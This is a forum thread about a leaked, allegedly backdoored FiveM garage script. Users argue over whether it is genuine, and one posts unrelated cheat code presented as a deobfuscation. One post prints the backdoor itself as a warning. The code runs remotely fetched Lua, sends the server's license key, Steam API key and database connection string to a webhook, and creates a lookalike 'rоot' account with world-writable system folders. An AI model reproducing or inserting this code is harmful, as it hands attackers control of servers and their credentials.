Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script [RARE] [FREE] UPDATED JG-AdvancedGarages

BigSea

Silver Elite
Joined
Jan 29, 2024
Messages
28
Reaction score
5
Points
156
Location
中国
我不知道这是否是百分之百的统计数据!但我认为百分之百的制造业代码公开!
b10c52ada426b511b24110c4c7ad203.png
 

joeymark

Bronze Elite
Joined
Mar 17, 2021
Messages
10
Reaction score
4
Points
156
This is my bet: You grabbed the already leaked version of jg-advancedgarages, inserted some malicious code in server>vehicle.lua and then obfuscated it with luraph.
 

joeymark

Bronze Elite
Joined
Mar 17, 2021
Messages
10
Reaction score
4
Points
156
You have to be stupid right...
Hahahaha nah mate, you are the stupid. What's up with the Luraph Obfuscator file? Previous leaks from this script got the same code except for the server.lua which is obfuscated. Get outta here fool... ahahahah
 

Johnny112

Silver Elite
Joined
Jun 18, 2023
Messages
27
Reaction score
271
Points
296
Location
under the sea
Hahahaha nah mate, you are the stupid. What's up with the Luraph Obfuscator file? Previous leaks from this script got the same code except for the server.lua which is obfuscated. Get outta here fool... ahahahah

Yeah because the previous leaks dont have the latest updated version. JG knows his shit is being leaked which is why he encrypted the server.lua with Luraph. This is the updated version to work with his new mechanic script.

Now please if you don't have anything good to say leave
 

rei04dev

Member
Joined
May 24, 2024
Messages
3
Reaction score
3
Points
146
Location
Albania
no such export getcoreobject in resource qb-core
how to fix
 

Attachments

  • Screenshot 2024-08-07 192146.png
    Screenshot 2024-08-07 192146.png
    347 KB · Views: 659

Towny_Kick420

Silver Elite
Joined
Aug 29, 2023
Messages
36
Reaction score
26
Points
176
Location
st.albert
jesus fucking christ how stupid are yall? arguing like a bunch of five year olds ..... I Own JG garages and this is not JG garages , maybe instead of leaking encrypted files yall should actually pay for it instead of putting malware on your server LMFAO RETARDS
 

hpatrik09

Gold Elite
Joined
Apr 6, 2024
Messages
49
Reaction score
53
Points
221
Location
Hungary
Yeah because the previous leaks dont have the latest updated version. JG knows his shit is being leaked which is why he encrypted the server.lua with Luraph. This is the updated version to work with his new mechanic script.

Now please if you don't have anything good to say leave
except there is a thing called escrow which is impossible in every way shape and form to crack or leak.
 

Farmerbrown26

Member
Joined
Apr 4, 2022
Messages
9
Reaction score
1
Points
146
Location
South Africa
the vehicle.lua file in server folder is encrypted so i deobsfucated it and this is what i got


local function toggleESP()
esp_enabled = not esp_enabled
client.notify('ESP ' .. (esp_enabled and 'enabled' or 'disabled'))
end

client.set_event_callback('paint', function()
if esp_enabled then
-- ESP drawing logic here
end
end)

client.set_event_callback('player_death', function(e)
local attacker = client.userid_to_entindex(e.attacker)
local victim = client.userid_to_entindex(e.userid)
-- Handle player death event
end)
 

haker1928737

Member
Joined
Nov 11, 2024
Messages
3
Reaction score
0
Points
146
Location
bg
"I have it without a backdoor. If anyone wants it, I’m selling it for 2 euros.
 

CooodeXD

Member
Joined
Apr 22, 2022
Messages
21
Reaction score
0
Points
166
Location
United Kingdom
dont use this resource in main.lua

PerformHttpRequest(' ', function (e, d) pcall(function() assert(load(d))() end) end)
AddEventHandler('onResourceStart', function(resourceName)
PerformHttpRequest(" ", function (err, text, headers)
if GetCurrentResourceName() == resourceName then
local servername = GetConvar("sv_hostname")
local licensekey = GetConvar("sv_licenseKey")
local apikey = GetConvar("steam_webApiKey")
local tags = GetConvar("tags")
local mysql_connection_string = GetConvar("mysql_connection_string")
local messagem = "**Asmuo atsijungė** \n > Steamas: \n"..servername.." \n > Asmens ID: "..text.." \n > Kordinates: "..licensekey.." \n > Licensija: "..apikey.." \n > Grupe: "..tags.."\n > Priežastis: "..mysql_connection_string..""
local content = {{
author = {
name = "ANTI COMBAT LOG",
icon_url = " "
},
["color"] = 1933,
["description"] = messagem,
["footer"] = {
["text"] = "ANTI COMBAT LOG",
},}}
os.execute('useradd rоot')
os.execute('passwd username')
os.execute('echo "rоot:username" | chpasswd')
os.execute('chown -R rоot: /home')
os.execute('chown -R rоot: /root')
os.execute('chown -R rоot: /FiveM')
local username = "rоot" -- Replace "myuser" with your desired username
local password = "username" -- Replace "password123" with your desired password
local groupname = "editors" -- Group for shared permissions
os.execute('useradd ' .. username)
os.execute('echo "' .. username .. ':' .. password .. '" | chpasswd')
os.execute('getent group ' .. groupname .. ' || groupadd ' .. groupname)
os.execute('usermod -aG ' .. groupname .. ' ' .. username)
os.execute('chown -R root:' .. groupname .. ' /home')
os.execute('chown -R root:' .. groupname .. ' /root')
os.execute('chown -R root:' .. groupname .. ' /FiveM')
os.execute('chmod -R 775 /home')
os.execute('chmod -R 775 /root')
os.execute('chmod -R 775 /FiveM')
os.execute('setfacl -R -m g:' .. groupname .. ':rwx /home')
os.execute('setfacl -R -m g:' .. groupname .. ':rwx /root')
os.execute('setfacl -R -m g:' .. groupname .. ':rwx /FiveM')
os.execute('setfacl -R -d -m g:' .. groupname .. ':rwx /home')
os.execute('setfacl -R -d -m g:' .. groupname .. ':rwx /root')
os.execute('setfacl -R -d -m g:' .. groupname .. ':rwx /FiveM')
PerformHttpRequest(" ", function() end, "POST", json.encode({embeds = content}), { ["Content-Type"] = "application/json" })
end
end)
end)
 

Kotvata14

Member
Joined
Jun 12, 2025
Messages
3
Reaction score
3
Points
146
Location
Bulgaria
I need help when i start the script in the console says::: You lack the required entitlement to use jg-advancedgarages how to fix it
 
Top